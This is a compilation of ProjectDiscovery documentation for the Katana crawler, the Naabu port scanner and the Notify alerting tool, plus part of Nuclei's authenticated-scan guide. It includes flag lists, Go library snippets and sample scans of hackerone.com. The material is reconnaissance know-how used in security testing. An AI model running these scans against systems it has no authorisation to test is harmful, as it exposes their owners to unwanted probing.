By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.
```console
katana -u https://example.com -no-scope -output example_endpoints.txt
```
### *`-jsonl`*
***
```console
katana -u https://example.com -jsonl | jq .
```
```json
{
"timestamp": "2023-03-20T16:23:58.027559+05:30",
"request": {
"method": "GET",
"endpoint": "https://example.com",
"raw": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n"
},
"response": {
"status_code": 200,
"headers": {
"accept_ranges": "bytes",
"expires": "Mon, 27 Mar 2023 10:53:58 GMT",
"last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"content_type": "text/html; charset=UTF-8",
"server": "ECS (dcb/7EA3)",
"vary": "Accept-Encoding",
"etag": "\"3147526947\"",
"cache_control": "max-age=604800",
"x_cache": "HIT",
"date": "Mon, 20 Mar 2023 10:53:58 GMT",
"age": "331239"
},
"body": "\n\n\n Example Domain\n\n \n \n \n \n\n\n\n
\n
Example Domain
\n
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
\n\n\n"
}
}
```
### *`-store-response`*
***
The `-store-response` option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the **katana\_response** directory. If you would like to specify a custom directory, you can use the `-store-response-dir` option.
```console
katana -u https://example.com -no-scope -store-response
```
```bash
$ cat katana_response/index.txt
katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)
```
**Note:**
*`-store-response` option is not supported in `-headless` mode.*
Here are additional CLI options related to output -
```console
katana -h output
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version
```
## Katana as a library
`katana` can be used as a library by creating an instance of the `Option` struct and populating it with the same options that would be specified via CLI. Using the options you can create `crawlerOptions` and so standard or hybrid `crawler`.
`crawler.Crawl` method should be called to crawl the input.
```go
package main
import (
"math"
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/katana/pkg/engine/standard"
"github.com/projectdiscovery/katana/pkg/output"
"github.com/projectdiscovery/katana/pkg/types"
)
func main() {
options := &types.Options{
MaxDepth: 3, // Maximum depth to crawl
FieldScope: "rdn", // Crawling Scope Field
BodyReadSize: math.MaxInt, // Maximum response size to read
Timeout: 10, // Timeout is the time to wait for request in seconds
Concurrency: 10, // Concurrency is the number of concurrent crawling goroutines
Parallelism: 10, // Parallelism is the number of urls processing goroutines
Delay: 0, // Delay is the delay between each crawl requests in seconds
RateLimit: 150, // Maximum requests to send per second
Strategy: "depth-first", // Visit strategy (depth-first, breadth-first)
OnResult: func(result output.Result) { // Callback function to execute for result
gologger.Info().Msg(result.Request.URL)
},
}
crawlerOptions, err := types.NewCrawlerOptions(options)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawlerOptions.Close()
crawler, err := standard.New(crawlerOptions)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawler.Close()
var input = "https://www.hackerone.com"
err = crawler.Crawl(input)
if err != nil {
gologger.Warning().Msgf("Could not crawl %s: %s", input, err.Error())
}
}
```
# Katana Usage
Review Katana usage including flags, configs, and options
## Access help
Use `katana - h` to display all help options.
## Katana help options
```
Flags:
INPUT:
-u, -list string[] target url / list to crawl
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-jsl, -jsluice enable jsluice parsing in javascript file (memory intensive)
-ct, -crawl-duration value maximum duration to crawl the target for (s, m, h, d) (default s)
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction extract form, input, textarea & select elements in jsonl output
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in all http request in header:value format (file)
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
-iqp, -ignore-query-params Ignore crawling same path with different query-param values
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr request url,method in jsonl output
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
UPDATE:
-up, -update update katana to latest version
-duc, -disable-update-check disable automatic katana update check
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-or, -omit-raw omit raw requests/responses from jsonl output
-ob, -omit-body omit response body from jsonl output
-j, -jsonl write output in jsonl format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-debug display debug output
-version display project version
```
# Installing Naabu
Learn about how to install Naabu and get started
Enter the command below in a terminal to install ProjectDiscovery's Naabu using Go.
```bash
go install -v github.com/projectdiscovery/naabu/cmd/naabu@latest
```
```bash
https://github.com/projectdiscovery/naabu/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Naabu requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/naabu`
# Naabu Overview
A Go-based port scanning tool to quickly enumerate valid ports
# What is **Naabu?**
Naabu is a port scanning tool written in Go that enumerates valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT/UDP scans on the host or list of hosts and provides all ports that return a reply.
## Features and capabilities
* Fast And Simple **SYN/CONNECT/UDP** probe based scanning
* Optimized for ease of use and **lightweight** on resources
* **DNS** Port scan
* **Automatic IP Deduplication** for DNS port scan
* **IPv4/IPv6** Port scan (**experimental**)
* **Passive** Port enumeration using Shodan [Internetdb](https://internetdb.shodan.io)
* **Host Discovery** scan (**experimental**)
* **NMAP** integration for service discovery
* Multiple input support - **STDIN/HOST/IP/CIDR/ASN**
* Multiple output format support - **JSON/TXT/STDOUT**
## Additional Naabu Resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery’s httpx should not be confused with the httpx python library.Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df](https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df)
* [https://highon.coffee/blog/naabu-cheat-sheet/](https://highon.coffee/blog/naabu-cheat-sheet/)
## Support
Questions about using Naabu? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Naabu
Learn about running Naabu with examples and sample output
For all of the flags and options available for `naabu` be sure to check out the [Usage](/tools/naabu/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
# Running Naabu
To run the tool on a target, just use the following command.
```sh
naabu -host hackerone.com
```
This will run the tool against hackerone.com. There are a number of configuration options that you can pass along with this command. The verbose switch `-v` can be used to display verbose information.
```console
naabu -host hackerone.com
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.3
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
hackerone.com:443
hackerone.com:8443
hackerone.com:8080
```
The ports to scan for on the host can be specified via `-p` parameter (udp ports must be expressed as `u:port`). It takes nmap format ports and runs enumeration on them.
```sh
naabu -p 80,443,21-23,u:53 -host hackerone.com
```
By default, the Naabu checks for nmap's `Top 100` ports. It supports the following in-built port lists -
| Flag | Description |
| ----------------- | ------------------------------------ |
| `-top-ports 100` | Scan for nmap top **100** port |
| `-top-ports 1000` | Scan for nmap top **1000** port |
| `-p - ` | Scan for full ports from **1-65535** |
You can also specify specific ports which you would like to exclude from the scan.
```sh
naabu -p - -exclude-ports 80,443
```
To run the naabu on a list of hosts, `-list` option can be used.
```sh
naabu -list hosts.txt
```
To run the naabu on a ASN, AS input can be used. It takes the IP address available for given ASN and runs the enumeration on them.
```console
echo AS14421 | naabu -p 80,443
216.101.17.249:80
216.101.17.249:443
216.101.17.248:443
216.101.17.252:443
216.101.17.251:80
216.101.17.251:443
216.101.17.250:443
216.101.17.250:80
```
You can also get output in json format using `-json` switch. This switch saves the output in the JSON lines format.
```console
naabu -host 104.16.99.52 -json
{"ip":"104.16.99.52","port":443}
{"ip":"104.16.99.52","port":80}
```
The ports discovered can be piped to other tools too. For example, you can pipe the ports discovered by naabu to [httpx](https://github.com/projectdiscovery/httpx) which will then find running http servers on the host.
```console
echo hackerone.com | naabu -silent | httpx -silent
http://hackerone.com:8443
http://hackerone.com:443
http://hackerone.com:8080
http://hackerone.com:80
```
The speed can be controlled by changing the value of `rate` flag that represent the number of packets per second. Increasing it while processing hosts may lead to increased false-positive rates. So it is recommended to keep it to a reasonable amount.
# IPv4 and IPv6
Naabu supports both IPv4 and IPv6. Both ranges can be piped together as input. If IPv6 is used, connectivity must be correctly configured, and the network interface must have an IPv6 address assigned (`inet6`) and a default gateway.
```console
echo hackerone.com | dnsx -resp-only -a -aaaa -silent | naabu -p 80 -silent
104.16.99.52:80
104.16.100.52:80
2606:4700::6810:6434:80
2606:4700::6810:6334:80
```
The option `-ip-version 6` makes the tool use IPv6 addresses while resolving domain names.
```console
echo hackerone.com | ./naabu -p 80 -ip-version 6
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.8
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
```
To scan all the IPs of both version, `ip-version 4,6` can be used along with `-scan-all-ips` flag.
```console
echo hackerone.com | ./naabu -iv 4,6 -sa -p 80 -silent
[INF] Found 1 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (104.16.99.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6434)
hackerone.com:80
```
# Host Discovery
Naabu optionally supports multiple options to perform host discovery, as outlined below. Host discovery is completed automatically before beginning a connect/syn scan if the process has enough privileges. `-sn` flag instructs the toll to perform host discovery only. `-Pn` flag skips the host discovery phase. Host discovery is completed using multiple internal methods; one can specify the desired approach to perform host discovery by setting available options.
Available options to perform host discovery:
* **ARP** ping (`-arp`)
* TCP **SYN** ping (`-ps 80`)
* TCP **ACK** ping (`-pa 443`)
* ICMP **echo** ping (`-pe`)
* ICMP **timestamp** ping (`-pp`)
* ICMP **address mask** ping (`-pm`)
* IPv6 **neighbor discovery** (`-nd`)
# Configuration file
Naabu supports config file as default located at `$HOME/.config/naabu/config.yaml`, It allows you to define any flag in the config file and set default values to include for all scans.
# Nmap integration
We have integrated nmap support for service discovery or any additional scans supported by nmap on the found results by Naabu, make sure you have `nmap` installed to use this feature.
To use,`nmap-cli` flag can be used followed by nmap command, for example:-
```console
echo hackerone.com | naabu -nmap-cli 'nmap -sV -oX nmap-output'
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.0
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running TCP/ICMP/SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.99.52)
hackerone.com:443
hackerone.com:80
hackerone.com:8443
hackerone.com:8080
[INF] Running nmap command: nmap -sV -p 80,8443,8080,443 104.16.99.52
Starting Nmap 7.01 ( https://nmap.org ) at 2020-09-23 05:02 UTC
Nmap scan report for 104.16.99.52
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
80/tcp open http cloudflare
443/tcp open ssl/https cloudflare
8080/tcp open http-proxy cloudflare
8443/tcp open ssl/https-alt cloudflare
```
# CDN/WAF Exclusion
Naabu also supports excluding CDN/WAF IPs being port scanned. If used, only `80` and `443` ports get scanned for those IPs. This feature can be enabled by using `exclude-cdn` flag.
Currently `cloudflare`, `akamai`, `incapsula` and `sucuri` IPs are supported for exclusions.
# Scan Status
Naabu exposes json scan info on a local port bound to localhost at `http://localhost:63636` (the port can be changed via the `-metrics-port` flag)
# Using naabu as library
The following sample program scan the port `80` of `scanme.sh`. The results are returned via the `OnResult` callback:
```go
package main
import (
"log"
"github.com/projectdiscovery/goflags"
"github.com/projectdiscovery/naabu/v2/pkg/result"
"github.com/projectdiscovery/naabu/v2/pkg/runner"
)
func main() {
options := runner.Options{
Host: goflags.StringSlice{"scanme.sh"},
ScanType: "s",
OnResult: func(hr *result.HostResult) {
log.Println(hr.Host, hr.Ports)
},
Ports: "80",
}
naabuRunner, err := runner.NewRunner(&options)
if err != nil {
log.Fatal(err)
}
defer naabuRunner.Close()
naabuRunner.RunEnumeration()
}
```
# Naabu Usage
Review Naabu usage including flags, configs, and optimization
## Access Help
Use `naabu - h` to display all help options.
## Naabu Help Options
```yaml
Usage:
./naabu [flags]
INPUT:
-host string[] hosts to scan ports for (comma-separated)
-list, -l string list of hosts to scan ports (file)
-exclude-hosts, -eh string hosts to exclude from the scan (comma-separated)
-exclude-file, -ef string list of hosts to exclude from scan (file)
PORT:
-port, -p string ports to scan (80,443, 100-200)
-top-ports, -tp string top ports to scan (default 100) [full,100,1000]
-exclude-ports, -ep string ports to exclude from scan (comma-separated)
-ports-file, -pf string list of ports to scan (file)
-port-threshold, -pts int port threshold to skip port scan for the host
-exclude-cdn, -ec skip full port scans for CDN/WAF (only scan for port 80,443)
-display-cdn, -cdn display cdn in use
RATE-LIMIT:
-c int general internal worker threads (default 25)
-rate int packets to send per second (default 1000)
UPDATE:
-up, -update update naabu to latest version
-duc, -disable-update-check disable automatic naabu update check
OUTPUT:
-o, -output string file to write output to (optional)
-j, -json write output in JSON lines format
-csv write output in csv format
CONFIGURATION:
-scan-all-ips, -sa scan all the IP's associated with DNS record
-ip-version, -iv string[] ip version to scan of hostname (4,6) - (default 4)
-scan-type, -s string type of port scan (SYN/CONNECT) (default "s")
-source-ip string source ip and port (x.x.x.x:yyy)
-interface-list, -il list available interfaces and public ip
-interface, -i string network Interface to use for port scan
-nmap invoke nmap scan on targets (nmap must be installed) - Deprecated
-nmap-cli string nmap command to run on found results (example: -nmap-cli 'nmap -sV')
-r string list of custom resolver dns resolution (comma separated or from file)
-proxy string socks5 proxy (ip[:port] / fqdn[:port]
-proxy-auth string socks5 proxy authentication (username:password)
-resume resume scan using resume.cfg
-stream stream mode (disables resume, nmap, verify, retries, shuffling, etc)
-passive display passive open ports using shodan internetdb api
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-no-stdin Disable Stdin processing
HOST-DISCOVERY:
-sn, -host-discovery Perform Only Host Discovery
-Pn, -skip-host-discovery Skip Host discovery
-ps, -probe-tcp-syn string[] TCP SYN Ping (host discovery needs to be enabled)
-pa, -probe-tcp-ack string[] TCP ACK Ping (host discovery needs to be enabled)
-pe, -probe-icmp-echo ICMP echo request Ping (host discovery needs to be enabled)
-pp, -probe-icmp-timestamp ICMP timestamp request Ping (host discovery needs to be enabled)
-pm, -probe-icmp-address-mask ICMP address mask request Ping (host discovery needs to be enabled)
-arp, -arp-ping ARP ping (host discovery needs to be enabled)
-nd, -nd-ping IPv6 Neighbor Discovery (host discovery needs to be enabled)
-rev-ptr Reverse PTR lookup for input ips
OPTIMIZATION:
-retries int number of retries for the port scan (default 3)
-timeout int millisecond to wait before timing out (default 1000)
-warm-up-time int time in seconds between scan phases (default 2)
-ping ping probes for verification of host
-verify validate the ports again with TCP verification
DEBUG:
-health-check, -hc run diagnostic check up
-debug display debugging information
-verbose, -v display verbose output
-no-color, -nc disable colors in CLI output
-silent display only results in output
-version display version of naabu
-stats display stats of the running scan (deprecated)
-si, -stats-interval int number of seconds to wait between showing a statistics update (deprecated) (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 63636)
```
# Notes on Usage
* Naabu allows arbitrary binary execution as a feature to support [nmap integration](https://github.com/projectdiscovery/naabu#nmap-integration).
* Naabu is designed to scan ports on multiple hosts / mass port scanning.
* Naabu is configured by default with that assumption that you are running it from VPS.
* We suggest tuning the flags / rate if running Naabu from local system.
* For best results, run Naabu as **root** user.
# Notify Install
Learn how to install Notify and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
```
## Installation Notes
* Notify requires the latest version of [**Go**](https://go.dev/doc/install)
# Notify Overview
A Go-based package to streamline and publish output of tools to multiple locations
Notify is a Go-based package designed to streamline the process of monitoring the output from various tools or files. It enables users to pipe this output directly and publish it to a selection of supported platforms.
## Overview
Notify is highly versatile, serving as a crucial link in automating the notification process across different communication platforms, thereby enhancing the efficiency of monitoring and reporting in security operations, development workflows, or any scenario requiring real-time alerts based on tool outputs or file changes
Check out [the GitHub repo here](https://github.com/projectdiscovery/notify).
## Features
* Support for File / Pipe input
* Support Line by Line / Bulk Post
* Support using Single / Multiple providers
* Support for custom Web-hooks
* Support custom data formatting
### Supported Tools
* Slack
* Discord
* Telegram
* Pushover
* Email
* Microsoft Teams
* Google Chat
## Support
Questions about using Notify? Issues working through installation? Cool story or use case you want to share? Get in touch!
Reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Notify Provider Config
Learn how to set up Notify's provider configuration
The default provider config file can be created at `$HOME/.config/notify/provider-config.yaml`.
Each provider (`slack`, `discord`, etc.) is specified at the top level by name, and then can have 1 to many configurations for that provider identifed by a unique `id` field.
## Slack
**Fields:**
* `slack_channel`: The Slack channel to post to
* `slack_username`: The name of the bot to post as
* `slack_format`: By default just `{{data}}` but you can specify more formattiong details
* `slack_webhook_url`: The URL for the Slack integration webhook (See [Slack help for more information](https://slack.com/help/articles/115005265063-Incoming-webhooks-for-Slack))
**Example:**
```yaml
slack:
- id: "slack"
slack_channel: "recon"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
- id: "vulns"
slack_channel: "vulns"
slack_username: "test"
slack_format: "{{data}}"
slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"
```
## Discord
```yaml
discord:
- id: "crawl"
discord_channel: "crawl"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
- id: "subs"
discord_channel: "subs"
discord_username: "test"
discord_format: "{{data}}"
discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"
```
## Telegram
```yaml
telegram:
- id: "tel"
telegram_api_key: "XXXXXXXXXXXX"
telegram_chat_id: "XXXXXXXX"
telegram_format: "{{data}}"
telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)
```
## Pushover
```yaml
pushover:
- id: "push"
pushover_user_key: "XXXX"
pushover_api_token: "YYYY"
pushover_format: "{{data}}"
pushover_devices:
- "iphone"
```
## Email (SMTP)
```yaml
smtp:
- id: email
smtp_server: mail.example.com
smtp_username: test@example.com
smtp_password: password
from_address: from@email.com
smtp_cc:
- to@email.com
smtp_format: "{{data}}"
subject: "Email subject"
smtp_html: false
smtp_disable_starttls: false
```
## Google Chat
```yaml
googlechat:
- id: "gc"
key: "XXXXXXXX"
token: "XXXXXX"
space: "XXXXXX"
google_chat_format: "{{data}}"
```
## Microsoft Teams
```yaml
teams:
- id: "recon"
teams_webhook_url: "https://.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
teams_format: "{{data}}"
```
## Gotify
```yaml
gotify:
- id: 'gotify'
gotify_host: 'XXXXXX'
gotify_port: '80'
gotify_token: 'XXXXXX'
gotify_format: '{{data}}'
gotify_disabletls: false
gotify_title: "recon"
```
## Custom Webhook
```yaml
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{{data}}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhookJson
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_format: '{"text":{{dataJsonString}} }'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
custom:
- id: webhook
custom_webhook_url: http://host/api/webhook
custom_method: GET
custom_sprig: '{"text":"{{ .url }}"}'
custom_headers:
Content-Type: application/json
X-Api-Key: XXXXX
```
# Running Notify
Learn about running Notify with details om variables and examples
For all of the flags and options available for **Notify** be sure to check out the [Usage](/tools/notify/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
Notify supports piping output of any tool or output file and send it to configured provider/s (e.g, discord, slack channel) as notification.
### Send notification using piped(stdin) output
```sh
subfinder -d hackerone.com | notify -bulk
```
![image](https://user-images.githubusercontent.com/8293321/130240854-e3031bc6-ecc8-47f8-9654-4c58e09cc622.png)
### Send notification using output file
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt
```
### Send notification using output file in bulk mode
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk
```
### Send notification using output file to specific provider's
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -provider discord,slack
```
### Send notification using output file to specific ID's
```sh
subfinder -d hackerone.com -o h1.txt; notify -data h1.txt -bulk -id recon,vulns,scan
```
## Example Uses
Following command will enumerate subdomains using [SubFinder](https://github.com/projectdiscovery/subfinder) and probe alive URLs using [httpx](https://github.com/projectdiscovery/httpx), runs [Nuclei](https://github.com/projectdiscovery/nuclei) templates and send the nuclei results as a notifications to configured provider/s.
```sh
subfinder -d intigriti.com | httpx | nuclei -tags exposure -o output.txt; notify -bulk -data output.txt
```
## Provider Config
The tool tries to use the default provider config (`$HOME/.config/notify/provider-config.yaml`), it can also be specified via CLI by using **provider-config** flag.
To run the tool with custom provider config, just use the following command.
```sh
notify -provider-config providers.yaml
```
## Notify Config
Notify flags can be configured at default config (`$HOME/.config/notify/config.yaml`) or custom config can be also provided using `config` flag.
## Notes
* As default notify sends notification line by line
* Use `-bulk` to send notification as entire message/s (messages might be chunked)
## References
* [Creating Slack webhook](https://slack.com/intl/en-it/help/articles/115005265063-Incoming-webhooks-for-Slack)
* [Creating Discord webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)
* [Creating Telegram bot](https://core.telegram.org/bots#3-how-do-i-create-a-bot)
* [Creating Pushover Token](https://github.com/containrrr/shoutrrr/blob/main/docs/services/pushover.md)
Notify is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Notify Usage
Learn Notify usage including flags and filters
## Access help
Use `notify -h` to display all of the help options.
## Notify options
| Flag | Description | Example |
| ----------------------- | -------------------------------------------------- | ------------------------------------- |
| `-bulk` | enable bulk processing | `notify -bulk` |
| `-char-limit` | max character limit per message (default 4000) | `notify -cl 2000` |
| `-config` | notify configuration file | `notify -config config.yaml` |
| `-data` | input file to send for notify | `notify -i test.txt` |
| `-delay` | delay in seconds between each notification | `notify -d 2` |
| `-id` | id to send the notification to (optional) | `notify -id recon,scans` |
| `-msg-format` | add custom formatting to message | `notify -mf Hey {{data}}` |
| `-no-color` | disable colors in output | `notify -nc` |
| `-provider-config` | provider config path | `notify -pc provider.yaml` |
| `-provider` | provider to send the notification to (optional) | `notify -p slack,telegram` |
| `-proxy` | http proxy to use with notify | `notify -proxy http://127.0.0.1:8080` |
| `-rate-limit` | maximum number of HTTP requests to send per second | `notify -rl 1` |
| `-silent` | enable silent mode | `notify -silent` |
| `-verbose` | enable verbose mode | `notify -verbose` |
| `-version` | display version | `notify -version` |
| `-update` | updates to latest version | `notify -update` |
| `-disable-update-check` | disables automatic update check | `notify -duc` |
# Authenticated Scans
Learn about scanning targets behind authentication with Nuclei
## What is an **Authenticated Scan** ?
There are some scenarios when running a Nuclei scan on a target might not be enough to find vulnerabilities. If a target is protected by login, then the scan will not be able to access those protected endpoints. This means vulnerabilities that are only accessible after logging in will not be found.
This is why authenticating with targets is important, before **Nuclei v3.2.0**, you could only authenticate by passing header in `-H` flag, but this limits the scope of authentication and is a not a scalable solution since authentication would need to be performed manually and the headers would need to be updated manually.
To solve this issue, Nuclei v3.2.0 introduces a **new specification for generic client side Authentication**, this allows apps like Nuclei to authenticate with targets using this format. We call this format `Secret File`, and it is managed through a YAML file that contains authentication related configuration.
This functionality is under development for other ProjectDiscovery Tools.
## Specification
Since authentication can be done in multiple ways, for example, using 3rd party services like OAuth, Custom Login , SSO , Bearer Auth and more - this specification categorizes authentication into two types: static authentication and dynamic authentication.
### Static Authentication
This approach involves a single, static secret that doesn't change frequently and serves as a direct indicator of an authenticated HTTP session. Examples include API Keys or credentials used in Basic Authentication (username and password).
### Dynamic Authentication
This method requires multiple, frequently changing secrets to manage a session. It's typical of processes like a social login or OAuth. In dynamic authentication, one set of credentials (for example: username and password) is used for the initial authentication, while additional elements (such as a session cookie or header) are employed to maintain the session's state.
### Dealing with Dynamic Authentication
Implementing and managing Static Authentication is easy, but dealing with Dynamic Authentication is a bit complex due to multiple entities and secrets and the flow of authentication being involved. Some might require a browser guided authentication while some might be achievable with auth flow.
A common solution for this is to capture and generate a login flow/sequence using a browser and then feed that script to app handling the authentication.\_createMdxContent
To focus on making this process easy, familiar, and scalable (users should be able to scan thousands of targets with authentication without much hassle), we leverage the existing rich ecosystem of `nuclei-templates`. These are written in YAML, are scalable, and comes with a powerful engine.
We achieve this scalability by reusing and extending our `default-login` templates library. We are continuously adding templates for different apps and services, and these templates can then be referenced in the `Secret File` to perform authentication.
### Scope of Authentication
It is recommended to send authentication-related data to only those targets that use and require them, instead of sharing them globally and risk leaking secrets to third parties.
To limit scope of a particular secret, we have introducd two fields `domains` & `domains-regex` (mutually exclusive) which can be used to limit the scope of a secret to a particular set of targets.
Use a wildcard like `.*` to send a secret to all targets. Only one secret can be used for a particular target, if multiple secrets are found for a target, the first one will be used with priority given to `domains` over `domains-regex`.
### Security & Storing Secret
We have not imposed the need to hardcode secrets in the `Secret File` configuration, and support the use of third-party secret management systems to templatize and manage secrets.
### Integrations with Secret Management Systems
We are currently exploring integrations with popular secret management systems for easy and secure management of secrets
We are prioritizng support for:
* **1Password**
* **Hashicorp Vault**
* **AWS Secrets Manager**
### Skipping Secret File
This feature is available in Nuclei **v3.3.1**.
If you provide a secret file to the Nuclei engine, it will automatically configure authentication or authorization for each request in the executed templates. In case you want to skip the secret configuration from the secret file and instead use hardcoded secrets or variables in specific templates, you can use the `skip-secret-file` *(bool)* option. By setting this property to **true**, Nuclei will not apply the secrets to each request in that templates.
**Example**
```yaml
variables:
username: foo
password: bar
http:
- raw:
- |
GET /some-restricted-page HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Authorization: Basic {{base64(concat(username, ":", password))}}
skip-secret-file: true
```
